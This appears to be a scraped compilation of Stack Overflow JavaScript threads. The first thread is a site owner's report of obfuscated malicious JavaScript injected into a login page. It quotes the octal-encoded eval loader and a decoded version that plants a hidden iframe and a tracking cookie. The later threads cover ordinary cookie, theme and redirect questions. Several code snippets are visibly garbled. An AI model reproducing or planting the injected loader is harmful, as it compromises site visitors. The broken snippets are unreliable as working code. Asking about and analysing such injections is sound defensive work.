Malicious javascript injected into login page [closed] - javascript

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Closed 9 years ago.
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I have a small web app that's written using CodeIgniter. However, I discovered recently that someone injected some javascript into my app's login page. When I look at the remote server's template file, the javascript is not there, but when I view the source in Chrome, I see the Javscript snippet below:
a = ("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,163,163,154,165,146,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,163,163,154,165,146,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,160,150,162,151,167,147,163,166,170,62,146,155,176,63,165,146,74,176,130,73,164,173,62,164,154,164,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,163,163,154,165,146,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,163,163,154,165,146,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,163,163,154,165,146,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,163,163,154,165,146,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16" ["split"](","));
ss = eval("Str" + "ing");
d = document;
for (i = 0; i < a.length; i += 1) {
a[i] = parseInt(a[i], 8) - (7 - 3);
try {
} catch (q) {
zz = 0;
try {
zz &= 2
} catch (q) {
zz = 1;
if (!zz)
if (window["document"]) eval(ss["fromCharCode"].apply(ss, a));
When I run my web app locally, I don't see this snippet so it's obvious that my remote server has been compromised.
After looking into the code, I realized the array contains a large series of characters used to build the actual code. As elclanrs pointed out, it seems the code tracks the user with a malicious cookie.
So my question is how does one manage to inject this type of code into my login page? I view the template file and the snippet is nowhere to be found, so I have no idea how to remove it from my page.

Seems to be setting a malicious cookie:
function zzzfff() {
var oohqb = document.createElement('iframe');
oohqb.src = ''; = 'absolute'; = '0'; = '1px'; = '1px'; = '1px'; = '1px';
if (!document.getElementById('oohqb')) {
document.write('<div id=\'oohqb\'></div>');
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');

Google how to sanitize input. For example, one should not be able to input the character <: if he does, you should replace it with <, which is the corresponding HTML entity.
With the data you gave, I can't really tell how this was injected: remove the injection loading a previous backup.


Storing Spaces and Colons in Cookie JavaScript

I am making a webpage with a form that saves the data you type in cookies in case you accidentally close the tab or navigate away before submitting.
I would like to know if there is a way to allow whitespace and colons to be in my cookie's data? For instance if user types "test test", on refresh the cookie will be stored and displayed as "test%2520test". Similarly colons display as "%3A". I believe this is possible with using encodeURIComponent but I am not sure exactly how. Below I will include my saveVideo, setCookie, and readCookie JS functions as well as an example input field.
Also, bonus question: What would be the best way to delete each cookie's data upon submit of the form?
<input id="video" name="video" type="text" onchange="saveVideo(this.value);"/>
function saveVideo(cookieValue)
var sel = document.getElementById('video');
saveclass = saveclass ? saveclass : document.body.className;
document.body.className = saveclass + ' ' + sel.value;
setCookie('video', cookieValue, 1 );
function setCookie(cookieName, cookieValue, nDays) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0)
expire.setTime(today.getTime() + 60 * 60 * 1000);
document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ' ') c = c.substring(1, c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
return null;
Any tips, pointers, general help is much appreciated!
Just change your code to following in the readCookie function, using decodeURIComponent:
return decodeURIComponent(c.substring(nameEQ.length, c.length));

Firing javascript event based on time of day

I'm looking for help to see if there is an easy quick way to fire a JS event based on the time of day a website opens in the browser.
Essentially what I want to do is between 5pm-5am of the users local time zone have this script fire. The script is currently wired to a button that simply flips the class of the body of the page to "night mode". I would like the two to work in harmony, automate based on time and the ability to override with the button if you want the dark or light theme.
function toggleClass(element, className) {
if (!element || !className) {
var classString = element.className,
nameIndex = classString.indexOf(className);
if (nameIndex == -1) {
classString += ' ' + className;
} else {
classString = classString.substr(0, nameIndex) + classString.substr(nameIndex + className.length);
element.className = classString;
document.getElementById('day-btn').addEventListener('click', function() {
toggleClass(document.getElementById('body'), 'night');
var time = new Date();
element = document.getElementById('body');
className = "night";
if(time.getHours() > 17 || time.getHours < 5) {
if (!element || !className) {
var classString = element.className,
nameIndex = classString.indexOf(className);
if (nameIndex == -1) {
classString += ' ' + className;
} else {
classString = classString.substr(0, nameIndex) + classString.substr(nameIndex + className.length);
element.className = classString;
This uses JS's built in Date functionalities which pull from the system. It runs a getHours() function which returns an int(0-23). The if statement (time.getHours() > 17 || time.getHours < 5) will then only run the code and change the theme if it is after 5pm or before 5 am. Hope this can get you started.

Javascript is undefined when project is put live

I have the following code, depending on the size of the screen will determine if they are re-directed to the mobile version of the site. Once on the mobile site if they choose to view the desktop version they're then redirected back to the desktop version and a cookie is created, that way they can continue to browse the desktop version without being re-directed again.
$(function() {
if (window.location.href.indexOf(".au") > -1) {
var oldURL = document.referrer;
var t = getCookie("fromMobile");
if (oldURL.indexOf("m.domain") > -1) {
var date = new Date();
var minutes = 30;
date.setTime(date.getTime() + (minutes * 60 * 1000));
document.cookie = "fromMobile=Yes; expires=" + date.toGMTString() + "; path=/";
} else {
if (t == "") {
if (screen.width <= 760) {
window.location = "";
function getCookie(cname) {
var name = cname + "=";
var ca = document.cookie.split(';');
for (var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ' ') c = c.substring(1);
if (c.indexOf(name) == 0) return c.substring(name.length, c.length);
return "";
When I'm running this on local/staging server it works as expected, I don't get any javascript errors, yet when pushed to live the error I get is on the following line
var t = getCookie("fromMobile");
It says getCookie is undefined
I'm uncertain why this works locally and on the staging server, I added alerts inside the getCookie when running locally/staging and I see the alerts....
Move the getCookie definition above "t" var, also you can prefer to use statement
expressions when mixing functions, this will fix the problem with undefined.

Getting Elapsed Time in JS

I am making a social network and when you post something, I want to show the time. I have the current code to display the time (this isn't only the time, it's also validating and posting the text):
$('#b').click(function () {
var v = $('#type').val();
var u = $('#input').val();
if (v !== "" && u !== ""){
var time = new Date();
var currentime =;
var x = currentime - time;
$("ul").prepend("<li>" + v + "<br />Posted by " + u + " " + x +" minutes ago </li>");
$('#type, #input').css('border','');
else if (v == "" && u == "") {
$('#type, #input').css('border','1px solid red');
else if (v == "") {
$('#type').css('border','1px solid red');
else {
$('#input').css('border','1px solid red');
When the time posts, it says 0 minutes ago (like I told it to), but after any amount of time, it still says 0.
Basically you set up a setInterval which governs ho frequently you update your time attribute. I used a span with a class .time to so you could theoretically update anything with time.
I would go further and hash your posts so you can easily retrieve each posts original time.
EDIT: added a new fiddle.

Adding cookies to drag and drop

I'm creating an drag and drop plugin and I thought to make it a little unique i would add a cookies feature to save the position of the dragged elements.
I'm currently using the following code for the get and set cookies:
$.setCookie = function(c_name, value, exdays) {
var exdate = new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
document.cookie = c_name + "=" + c_value;
$.getCookie = function(c_name) {
var i, x, y, ARRcookies = document.cookie.split(";");
for (i = 0; i < ARRcookies.length; i++) {
x = ARRcookies[i].substr(0, ARRcookies[i].indexOf("="));
y = ARRcookies[i].substr(ARRcookies[i].indexOf("=") + 1);
x = x.replace(/^\s+|\s+$/g, "");
if (x == c_name) {
return unescape(y);
These work fine. But What I can't get to work is this:
if (o.cookies === true) {
$(oj).mouseup(function() {
var currentPos = $(oj).position();
$.setCookie('tposition22' + $(oj).index(),, 365);
$.setCookie('lposition22' + $(oj).index(), currentPos.left, 365);
alert('Cookies Set!')
$(function() {
var savedLeftPosition = $.getCookie('lposition22' + $(oj).index());
var savedTopPosition = $.getCookie('tposition22' + $(oj).index());
top: savedTopPosition,
left: savedLeftPosition
Code Description: o.cookies === true is to check if cookies is set to true; setCookie works(I checked); oj is referring to this, the selector.
Problem: I need to be able to get the value of the cookie. Because, im currently trying to make the value the position of the dragged element and then retrieving it.
As you can see in $.setCookie('tposition22' + $(oj).index(),, 365);, is in the value spot. To get the Y position of the dragged element.
Main Question: Is there a way to retrieve the value of a cookie?
Sure you can retrieve the value of a cookie. I like not reinventing the wheel, though, and since you're already in jQuery-ville, why not use a jQuery cookie plugin? I think there's even an "official" one. Should provide simple access to everything you need for interacting with cookies (really, just getting and setting one!).
With regard to your specific code, where is o (from o.cookies) coming from, and why is it expected to be a boolean?
Side note: almost all code can benefit from properly-named variables. Letting your minifier reduce down to single-letter will keep your code more readable.
